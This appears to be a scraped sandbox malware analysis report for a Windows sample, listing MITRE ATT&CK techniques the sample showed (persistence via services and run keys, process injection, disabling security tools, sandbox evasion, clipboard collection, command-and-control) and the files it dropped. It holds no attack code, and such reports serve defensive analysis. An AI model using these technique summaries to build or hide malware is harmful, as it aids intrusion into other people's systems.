API String ID: 1379636189-86236235
Opcode ID: a6c7436824d35f4d3c93bc14857c885df91ecc8efcb5339a5b8a6a707b2c3618
Instruction ID: b9555d7816c540198e9a3922b521e5299ced3bb7b9033c3ea87362fcbacdb9f8
Opcode Fuzzy Hash: a6c7436824d35f4d3c93bc14857c885df91ecc8efcb5339a5b8a6a707b2c3618
Instruction Fuzzy Hash: 9911EF35D04608ABDF15DB648C41EEDBBB6EF89340F1080AAF54A77093EE316D888F60

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MiJZ3z4t5K.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Amatol_20241205054016.log

C:\Users\user\AppData\Local\Temp\Qjsync.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0a1wb0ac.eoa.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdrqximq.55i.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1wuh0n0.od0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwnrvxkx.ejs.psm1

C:\Users\user\AppData\Local\Temp\bbqnedcfmy

C:\Users\user\AppData\Local\Temp\caf5babf

C:\Users\user\AppData\Local\Temp\dkxfiwecupyge

C:\Users\user\AppData\Local\Temp\e02535b7

Windows Analysis Report
MiJZ3z4t5K.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre